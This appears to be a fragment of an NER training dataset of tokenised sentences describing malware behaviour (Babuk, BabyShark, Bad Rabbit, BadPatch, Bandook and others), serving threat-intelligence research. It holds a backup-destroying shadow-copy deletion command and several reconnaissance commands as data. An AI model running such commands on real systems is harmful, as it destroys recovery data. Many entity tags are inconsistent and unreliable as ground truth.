"HTTP", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BUSHWALK", - "is", - "a", - "web", - "shell", - "that", - "has", - "the", - "ability", - "to", - "execute", - "arbitrary", - "commands", - "or", - "write", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "can", - "use", - "ChaCha8", - "and", - "ECDH", - "to", - "encrypt", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "has", - "the", - "ability", - "to", - "unpack", - "itself", - "into", - "memory", - "using", - "XOR." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Babuk", - "can", - "stop", - "anti-virus", - "services", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "has", - "the", - "ability", - "to", - "enumerate", - "files", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "has", - "the", - "ability", - "to", - "delete", - "shadow", - "volumes", - "using", - "<code>vssadmin.exe", - "delete", - "shadows", - "/all", - "/quiet</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "can", - "use", - "multiple", - "Windows", - "API", - "calls", - "for", - "actions", - "on", - "compromised", - "hosts", - "including", - "discovery", - "and", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "has", - "the", - "ability", - "to", - "enumerate", - "network", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "has", - "the", - "ability", - "to", - "check", - "running", - "processes", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "can", - "stop", - "specific", - "services", - "related", - "to", - "backups." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Versions", - "of", - "Babuk", - "have", - "been", - "packed." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "can", - "enumerate", - "disk", - "volumes,", - "get", - "disk", - "information,", - "and", - "query", - "service", - "status." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "can", - "use", - "“WNetOpenEnumW”", - "and", - "“WNetEnumResourceW”", - "to", - "enumerate", - "files", - "in", - "network", - "resources", - "for", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "can", - "enumerate", - "all", - "services", - "running", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Babuk", - "has", - "the", - "ability", - "to", - "use", - "the", - "command", - "line", - "to", - "control", - "execution", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "the", - "ability", - "to", - "decode", - "downloaded", - "files", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "cleaned", - "up", - "all", - "files", - "associated", - "with", - "the", - "secondary", - "payload", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "used", - "<code>dir</code>", - "to", - "search", - "for", - "\"programfiles\"", - "and", - "\"appdata\"." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "downloaded", - "additional", - "files", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "a", - "PowerShell-based", - "remote", - "administration", - "ability", - "that", - "can", - "implement", - "a", - "PowerShell", - "or", - "C#", - "based", - "keylogger." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "used", - "mshta.exe", - "to", - "download", - "and", - "execute", - "applications", - "from", - "a", - "remote", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "executed", - "the", - "<code>tasklist</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "executed", - "the", - "<code>reg", - "query</code>", - "command", - "for", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal", - "Server", - "Client\\Default</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "added", - "a", - "Registry", - "key", - "to", - "ensure", - "all", - "future", - "macros", - "are", - "enabled", - "for", - "Microsoft", - "Word", - "and", - "Excel", - "as", - "well", - "as", - "for", - "additional", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "used", - "scheduled", - "tasks", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "encoded", - "data", - "using", - "certutil", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "executed", - "the", - "<code>ver</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "executed", - "the", - "<code>ipconfig", - "/all</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "executed", - "the", - "<code>whoami</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BabyShark", - "has", - "used", - "cmd.exe", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "been", - "signed", - "with", - "self", - "signed", - "digital", - "certificates", - "mimicking", - "a", - "legitimate", - "software", - "company." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Org" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "used", - "compressed", - "and", - "decimal", - "encoded", - "VBS", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "used", - "a", - "custom", - "routine", - "to", - "decrypt", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "the", - "ability", - "to", - "remove", - "files", - "and", - "folders", - "related", - "to", - "previous", - "infections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "the", - "ability", - "to", - "identify", - "folders", - "and", - "files", - "related", - "to", - "previous", - "infections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "the", - "ability", - "to", - "set", - "folders", - "or", - "files", - "to", - "be", - "hidden", - "from", - "the", - "Windows", - "Explorer", - "default", - "view." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "can", - "download", - "and", - "execute", - "additional", - "payloads", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "compromised", - "victims", - "via", - "links", - "to", - "URLs", - "hosting", - "malicious", - "content." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "hidden", - "malicious", - "payloads", - "in", - "<code>%USERPROFILE%\\Adobe\\Driver\\dwg\\</code>", - "and", - "mimicked", - "the", - "legitimate", - "DHCP", - "service", - "binary." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "can", - "leverage", - "API", - "functions", - "such", - "as", - "<code>ShellExecuteA</code>", - "and", - "<code>HttpOpenRequestA</code>", - "in", - "the", - "process", - "of", - "downloading", - "and", - "executing", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "the", - "ability", - "to", - "use", - "hidden", - "columns", - "in", - "Excel", - "spreadsheets", - "to", - "store", - "executable", - "files", - "or", - "commands", - "for", - "VBA", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "the", - "ability", - "to", - "use", - "scheduled", - "tasks", - "to", - "repeatedly", - "execute", - "malicious", - "payloads", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "the", - "ability", - "to", - "gather", - "the", - "victim's", - "computer", - "name." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "used", - "VBS", - "to", - "install", - "its", - "downloader", - "component", - "and", - "malicious", - "documents", - "with", - "VBA", - "macro", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "has", - "the", - "ability", - "to", - "use", - "HTTPS", - "for", - "C2", - "communiations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackConfig", - "can", - "download", - "and", - "run", - "batch", - "files", - "to", - "execute", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "writes", - "collected", - "data", - "to", - "a", - "temporary", - "file", - "in", - "an", - "encrypted", - "form", - "before", - "exfiltration", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Backdoor.Oldrea", - "samples", - "contain", - "a", - "publicly", - "available", - "Web", - "browser", - "password", - "recovery", - "tool." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "collects", - "address", - "book", - "information", - "from", - "Outlook." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "contains", - "a", - "cleanup", - "module", - "that", - "removes", - "traces", - "of", - "itself", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "collects", - "information", - "about", - "available", - "drives,", - "default", - "browser,", - "desktop", - "file", - "list,", - "My", - "Documents,", - "Internet", - "history,", - "program", - "files,", - "and", - "root", - "of", - "available", - "drives.", - "It", - "also", - "searches", - "for", - "ICS-related", - "software", - "files." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "can", - "download", - "additional", - "modules", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "can", - "use", - "a", - "network", - "scanning", - "module", - "to", - "identify", - "ICS-related", - "ports." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "collects", - "information", - "about", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "injects", - "itself", - "into", - "explorer.exe." - ], - "ner_tags": [ - "B-Way", - "B-Way", - "I-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "adds", - "Registry", - "Run", - "keys", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "can", - "enumerate", - "and", - "map", - "ICS-specific", - "systems", - "in", - "victim", - "environments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "can", - "use", - "rundll32", - "for", - "execution", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Backdoor.Oldrea", - "samples", - "use", - "standard", - "Base64", - "+", - "bzip2,", - "and", - "some", - "use", - "standard", - "Base64", - "+", - "reverse", - "XOR", - "+", - "RSA-2048", - "to", - "decrypt", - "data", - "received", - "from", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "collects", - "information", - "about", - "the", - "OS", - "and", - "computer", - "name." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "collects", - "information", - "about", - "the", - "Internet", - "adapter", - "configuration." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Backdoor.Oldrea", - "collects", - "the", - "current", - "username", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "attempted", - "to", - "bypass", - "UAC", - "and", - "gain", - "elevated", - "administrative", - "privileges." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "encrypted", - "files", - "and", - "disks", - "using", - "AES-128-CBC", - "and", - "RSA-2048." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "spread", - "through", - "watering", - "holes", - "on", - "popular", - "sites", - "by", - "injecting", - "JavaScript", - "into", - "the", - "HTML", - "body", - "or", - "a", - "<code>.js</code>", - "file." - ], - "ner_tags": [ - "B-Tool", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "used", - "the", - "EternalRomance", - "SMB", - "exploit", - "to", - "spread", - "through", - "victim", - "networks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Features", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "used", - "an", - "executable", - "that", - "installs", - "a", - "modified", - "bootloader", - "to", - "prevent", - "normal", - "boot-up." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "used", - "Mimikatz", - "to", - "harvest", - "credentials", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "been", - "executed", - "through", - "user", - "installation", - "of", - "an", - "executable", - "disguised", - "as", - "a", - "flash", - "installer." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "masqueraded", - "as", - "a", - "Flash", - "Player", - "installer", - "through", - "the", - "executable", - "file", - "<code>install_flash_player.exe</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "used", - "various", - "Windows", - "API", - "calls." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "enumerates", - "open", - "SMB", - "shares", - "on", - "internal", - "victim", - "networks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit’s", - "<code>infpub.dat</code>", - "file", - "uses", - "NTLM", - "login", - "credentials", - "to", - "brute", - "force", - "Windows", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "can", - "enumerate", - "all", - "running", - "processes", - "to", - "compare", - "hashes." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "has", - "used", - "rundll32", - "to", - "launch", - "a", - "malicious", - "DLL", - "as", - "<code>C:Windowsinfpub.dat</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit’s", - "<code>infpub.dat</code>", - "file", - "creates", - "a", - "scheduled", - "task", - "to", - "launch", - "a", - "malicious", - "executable." - ], - "ner_tags": [ - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bad", - "Rabbit", - "drops", - "a", - "file", - "named", - "<code>infpub.dat</code>into", - "the", - "Windows", - "directory", - "and", - "is", - "executed", - "through", - "SCManager", - "and", - "<code>rundll.exe</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "collects", - "files", - "from", - "the", - "local", - "system", - "that", - "have", - "the", - "following", - "extensions,", - "then", - "prepares", - "them", - "for", - "exfiltration:", - ".xls,", - ".xlsx,", - ".pdf,", - ".mdb,", - ".rar,", - ".zip,", - ".doc,", - ".docx." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "BadPatch", - "searches", - "for", - "files", - "with", - "specific", - "file", - "extensions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "can", - "download", - "and", - "execute", - "or", - "update", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "BadPatch", - "has", - "a", - "keylogging", - "capability." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "stores", - "collected", - "data", - "in", - "log", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "uses", - "SMTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "establishes", - "a", - "foothold", - "by", - "adding", - "a", - "link", - "to", - "the", - "malware", - "executable", - "in", - "the", - "startup", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "captures", - "screenshots", - "in", - ".jpg", - "format", - "and", - "then", - "exfiltrates", - "them." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "uses", - "WMI", - "to", - "enumerate", - "installed", - "security", - "products", - "in", - "the", - "victim’s", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "attempts", - "to", - "detect", - "if", - "it", - "is", - "being", - "run", - "in", - "a", - "Virtual", - "Machine", - "(VM)", - "using", - "a", - "WMI", - "query", - "for", - "disk", - "drive", - "name,", - "BIOS,", - "and", - "motherboard", - "information." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "collects", - "the", - "OS", - "system,", - "OS", - "version,", - "MAC", - "address,", - "and", - "the", - "computer", - "name", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BadPatch", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "modules", - "that", - "are", - "capable", - "of", - "capturing", - "audio." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "was", - "signed", - "with", - "valid", - "Certum", - "certificates." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "can", - "support", - "commands", - "to", - "execute", - "Java-based", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "can", - "collect", - "local", - "files", - "from", - "the", - "system", - "." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "decoded", - "its", - "PowerShell", - "script." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Bandook", - "can", - "upload", - "files", - "from", - "a", - "victim's", - "machine", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "a", - "command", - "to", - "delete", - "a", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "a", - "command", - "to", - "list", - "files", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "can", - "download", - "files", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "contains", - "keylogging", - "capabilities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bandook", - "has", - "used", - "lure", - "documents", - "to", - "convince", - "the", - "user", - "to", - "enable", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - 